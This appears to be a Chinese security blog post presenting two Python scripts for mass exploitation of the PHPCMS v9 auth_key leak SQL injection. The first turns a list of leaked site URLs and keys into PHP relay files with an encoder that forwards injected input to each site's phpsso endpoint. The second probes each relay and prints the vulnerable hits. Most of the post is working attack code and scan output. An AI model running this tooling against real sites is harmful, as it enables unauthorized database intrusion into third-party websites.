phpcmssqllin
phpcms auth_key注入漏洞批量检测
前言:
一位基友问我能不能写批量检测,然后就写了。这个漏洞主要是因为auth_key泄露造成的sql注入漏洞。中转检测的php网上已经有了
我们只需要写个批量检测就行了。
思路:
1.首先你得了解这个漏洞为什么会发生?我该怎么去利用?详细请看这篇文章:https://www.waitalone.cn/phpcmsv9-authkey-sql.html
2.既然网上已经给出了PHP的中转检测脚本,我们只需要批量替换掉php检测脚本中的URL和key,然后把生成的修改好的PHP文件放入一个目录即可
3.然后把生成的目录放入你的PHP环境,进行读取该路径下的所有PHP文件名。然后发送请求判断返回结果是0还是-1即可。(0代表无漏洞,-1代表有漏洞)
正文:
jsqllin.py
import requests
import os
import re
# jsqllin.py -- generator half of the article's batch checker.
# Flow (per the article): read a leak list, split each line into its URL and
# its auth_key, then stamp both into a PHP relay template, one file per line.
# Stage 1: write the URL part of every line of phpv9_key_leak.txt to saveurl.txt.
keys=[]   # never used below
#if os.path.exists('v9.php'):
# print('[+]ok v9.php')
## print('[-]not found v9.php')
# exit()
xs=open('saveurl.txt','w')   # truncate the output file before the appends below
xs.close()
print('[+]Write url')
dw=open('phpv9_key_leak.txt','r')   # presumably one "url|key" record per line -- see the '|' strip in stage 2; confirm against the input
for j in dw.readlines():
    ldw="".join(j.split('\n'))   # drop the trailing newline
    qe = re.finditer('(http|https)://(www.)?(\w+(\.)?)+', ldw)   # regex: locate URL-like spans in the line
    for q in qe:
        # str(q) is the Match object's repr (it contains match='...'), so the URL is
        # pulled back out of that repr text rather than read via q.group().
        rc = re.findall("[a-zA-z]+://[^\s]*", str(q))
        for j in rc:   # NOTE: shadows the outer loop variable j
            # strip the "'" and ">" that close the repr before writing the bare URL
            we = "{}".format(j).replace('>', '').replace("'", '')
            print(we,file=open('saveurl.txt','a'))   # one URL per line; the handle is never closed explicitly
# Stage 2: remove the URL and the '|' separator from each line and keep the
# remaining fixed-length alphanumeric run as the auth_key. keys.txt is written
# in the same line order as saveurl.txt, and the two are paired by position
# in the generation stage.
wc=[]   # never used below
lo=open('keys.txt','w')   # truncate before the appends below
lo.close()
dkv=open('phpv9_key_leak.txt','r')
for r in dkv.readlines():
    wq="".join(r.split('\n'))   # drop the trailing newline
    qe=re.sub('(http|https)://(www.)?(\w+(\.)?)+','',wq)   # same URL pattern as stage 1, here used to delete the URL
    qc=re.sub('\|','',str(qe))   # delete the '|' separator
    # one bracket group per character, so this matches a run of exactly that many
    # characters from the class; each match is treated as one key
    tx=re.findall('[a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9]',str(qc))   # regex: extract the key
    for k in tx:
        print(k,file=open('keys.txt','a'))   # one key per line; handle never closed explicitly
# Stage 3: read both lists back into memory, newline-stripped, index-aligned.
pds2=[]   # URLs, in saveurl.txt line order
wqe2=[]   # keys, in keys.txt line order
pds=open('saveurl.txt','r')
wqe=open('keys.txt','r')
for b in pds.readlines():
    pds2.append("".join(b.split('\n')))
for w in wqe.readlines():
    wqe2.append("".join(w.split('\n')))
# Stage 4: emit one PHP relay file per URL into ./scv (the directory must already exist).
# Each file embeds one URL/key pair; when served by a local PHP install it forwards
# the caller's ?id= value to that site's phpsso getuserinfo endpoint. From the
# probed site's side, the request path /phpsso_server/?m=phpsso&c=index&a=getuserinfo
# with a data= parameter is what would appear in its web-server access log.
for x in range(int(len(pds2))):   # create one empty file per URL -- read pds2 (URL list) length
    os.mknod('scv/{}v9.php'.format(x))   # raises FileExistsError if the file is already there
dr=os.listdir('scv')   # read every file name under scv/
for d in range(0,len(pds2)):
    # The target file is dr[d], the d-th entry of the directory listing, not
    # '{d}v9.php' itself -- os.listdir order is arbitrary, so the d-th URL/key
    # pair lands in whichever file happens to be listed d-th.
    # The triple-quoted template below is emitted verbatim (only the two '{}'
    # placeholders are filled), so its lines stay at column 0.
    print("""<?php
set_time_limit(0);
$wang_url = '{}'; """.format(pds2[d])+"""
$auth_key = '{}';""".format(wqe2[d])+"""
$str = "uid=1" . stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
$key_length = 4;
$key = md5($key);
$fixedkey = hash('md5', $key);
$egiskeys = md5(substr($fixedkey, 16, 16));
$runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
$keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
$i = 0;
$result = '';
$string_length = strlen($string);
for ($i = 0; $i < $string_length; $i++) {
$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
}
if ($operation == 'ENCODE') {
return $runtokey . str_replace('=', '', base64_encode($result));
} else {
if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
}
}
?>
""",file=open('scv/{}'.format(dr[d]),'a'))   # append the filled-in template to each generated file in turn
jiances.py
import requests
import os
# jiances.py -- checker half: walks a directory of generated relay files and
# requests each one through a local PHP server, classifying by the reply text.
print('[!]请确保你把生成的php文件夹拷贝到你的php环境目录之下,然后请输入目录的路径。我将获取路径下所有的文件进行检测')
user=input('path:')   # local directory holding the generated .php files (read at import time)
xj=open('save.txt','w')   # truncate the scratch list of file names
xj.close()
def exploitsqllin() -> None:
    """Request every file listed under the module-level ``user`` directory via the local relay.

    File names are first written to save.txt, then read back and appended to
    ``http://127.0.0.1/scv/`` -- the request URL is always under /scv/ regardless
    of which directory ``user`` names. Each reply is classified by substring,
    following the article's convention that the relay returns 0 for
    not-vulnerable and -1 for vulnerable, and the verdict is printed to stdout.
    Returns nothing; requests exceptions propagate to the caller.
    """
    cs=os.listdir(user)   # every entry in the user-supplied directory
    # NOTE: the header name is written 'user-gent', not 'User-Agent', so the
    # request still carries python-requests' default User-Agent -- a fingerprint
    # a defender would see in the local server's log -- plus this extra header.
    headers={'user-gent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    for s in cs:   # iterate file names
        print(s,file=open('save.txt','a'))   # record each name in save.txt (handle never closed explicitly)
    dk=open('save.txt','r')
    for r in dk.readlines():
        wed="".join(r.split('\n'))   # drop the trailing newline
        urls='http://127.0.0.1/scv/{}?id=1'.format(wed)   # build the local relay URL for this file
        rq=requests.get(url=urls,headers=headers)   # send the request and classify the reply
        # Substring classification: any reply containing the character '0' is
        # reported as not vulnerable; the '-1' test only runs on replies that
        # contain no '0' at all. Replies matching neither print nothing.
        if '0' in rq.text:
            print('[-]Not bug {}'.format(rq.url))
        elif '-1' in rq.text:
            print('[+]Bug url {}'.format(rq.url))
# Runs unconditionally at import time (no __main__ guard): the module prompts
# for a path above and starts requesting as soon as it is executed.
exploitsqllin()
图片:
生成的php
检测结果:
漏洞几率不是很大
[-]Not bug http://127.0.0.1/scv/79v9.php?id=1
[-]Not bug http://127.0.0.1/scv/66v9.php?id=1
[-]Not bug http://127.0.0.1/scv/2v9.php?id=1
[+]Bug url http://127.0.0.1/scv/45v9.php?id=1
[-]Not bug http://127.0.0.1/scv/47v9.php?id=1
[-]Not bug http://127.0.0.1/scv/74v9.php?id=1
[-]Not bug http://127.0.0.1/scv/91v9.php?id=1
[-]Not bug http://127.0.0.1/scv/90v9.php?id=1
[-]Not bug http://127.0.0.1/scv/88v9.php?id=1
[-]Not bug http://127.0.0.1/scv/57v9.php?id=1
[+]Bug url http://127.0.0.1/scv/89v9.php?id=1
[-]Not bug http://127.0.0.1/scv/78v9.php?id=1
[-]Not bug http://127.0.0.1/scv/14v9.php?id=1
[-]Not bug http://127.0.0.1/scv/5v9.php?id=1
[-]Not bug http://127.0.0.1/scv/15v9.php?id=1
[-]Not bug http://127.0.0.1/scv/63v9.php?id=1
[-]Not bug http://127.0.0.1/scv/76v9.php?id=1
[-]Not bug http://127.0.0.1/scv/87v9.php?id=1
[+]Bug url http://127.0.0.1/scv/26v9.php?id=1
[-]Not bug http://127.0.0.1/scv/72v9.php?id=1
[+]Bug url http://127.0.0.1/scv/43v9.php?id=1
[-]Not bug http://127.0.0.1/scv/84v9.php?id=1
[-]Not bug http://127.0.0.1/scv/25v9.php?id=1
[+]Bug url http://127.0.0.1/scv/92v9.php?id=1
[-]Not bug http://127.0.0.1/scv/13v9.php?id=1
[-]Not bug http://127.0.0.1/scv/71v9.php?id=1
[-]Not bug http://127.0.0.1/scv/75v9.php?id=1
[-]Not bug http://127.0.0.1/scv/56v9.php?id=1
[-]Not bug http://127.0.0.1/scv/19v9.php?id=1
[+]Bug url http://127.0.0.1/scv/50v9.php?id=1
[-]Not bug http://127.0.0.1/scv/31v9.php?id=1
[-]Not bug http://127.0.0.1/scv/41v9.php?id=1
[-]Not bug http://127.0.0.1/scv/53v9.php?id=1
[-]Not bug http://127.0.0.1/scv/37v9.php?id=1
[-]Not bug http://127.0.0.1/scv/44v9.php?id=1
[-]Not bug http://127.0.0.1/scv/85v9.php?id=1
[-]Not bug http://127.0.0.1/scv/42v9.php?id=1
[+]Bug url http://127.0.0.1/scv/52v9.php?id=1
[+]Bug url http://127.0.0.1/scv/17v9.php?id=1
[-]Not bug http://127.0.0.1/scv/64v9.php?id=1
[-]Not bug http://127.0.0.1/scv/80v9.php?id=1
[-]Not bug http://127.0.0.1/scv/3v9.php?id=1
[-]Not bug http://127.0.0.1/scv/4v9.php?id=1
[-]Not bug http://127.0.0.1/scv/58v9.php?id=1
[-]Not bug http://127.0.0.1/scv/68v9.php?id=1
[-]Not bug http://127.0.0.1/scv/48v9.php?id=1
[-]Not bug http://127.0.0.1/scv/20v9.php?id=1
[+]Bug url http://127.0.0.1/scv/38v9.php?id=1
[-]Not bug http://127.0.0.1/scv/62v9.php?id=1
[-]Not bug http://127.0.0.1/scv/29v9.php?id=1
[-]Not bug http://127.0.0.1/scv/24v9.php?id=1
[-]Not bug http://127.0.0.1/scv/32v9.php?id=1
[-]Not bug http://127.0.0.1/scv/61v9.php?id=1
[-]Not bug http://127.0.0.1/scv/86v9.php?id=1
[-]Not bug http://127.0.0.1/scv/46v9.php?id=1
[-]Not bug http://127.0.0.1/scv/33v9.php?id=1
[-]Not bug http://127.0.0.1/scv/39v9.php?id=1
[-]Not bug http://127.0.0.1/scv/1v9.php?id=1
[-]Not bug http://127.0.0.1/scv/51v9.php?id=1
[-]Not bug http://127.0.0.1/scv/93v9.php?id=1
[-]Not bug http://127.0.0.1/scv/36v9.php?id=1
[-]Not bug http://127.0.0.1/scv/81v9.php?id=1
[-]Not bug http://127.0.0.1/scv/83v9.php?id=1
[-]Not bug http://127.0.0.1/scv/27v9.php?id=1
[-]Not bug http://127.0.0.1/scv/55v9.php?id=1
[-]Not bug http://127.0.0.1/scv/23v9.php?id=1
[-]Not bug http://127.0.0.1/scv/12v9.php?id=1
[-]Not bug http://127.0.0.1/scv/95v9.php?id=1
[-]Not bug http://127.0.0.1/scv/40v9.php?id=1
[-]Not bug http://127.0.0.1/scv/0v9.php?id=1
[-]Not bug http://127.0.0.1/scv/77v9.php?id=1
[-]Not bug http://127.0.0.1/scv/35v9.php?id=1
[-]Not bug http://127.0.0.1/scv/73v9.php?id=1
[-]Not bug http://127.0.0.1/scv/21v9.php?id=1
[-]Not bug http://127.0.0.1/scv/18v9.php?id=1
[-]Not bug http://127.0.0.1/scv/65v9.php?id=1
[-]Not bug http://127.0.0.1/scv/16v9.php?id=1
[-]Not bug http://127.0.0.1/scv/34v9.php?id=1
[-]Not bug http://127.0.0.1/scv/59v9.php?id=1
[+]Bug url http://127.0.0.1/scv/94v9.php?id=1
[-]Not bug http://127.0.0.1/scv/10v9.php?id=1
[-]Not bug http://127.0.0.1/scv/22v9.php?id=1
文章标题:phpcmssqllin
本文作者:九世
发布时间:2018-07-28, 21:31:55
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/d74d279d.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。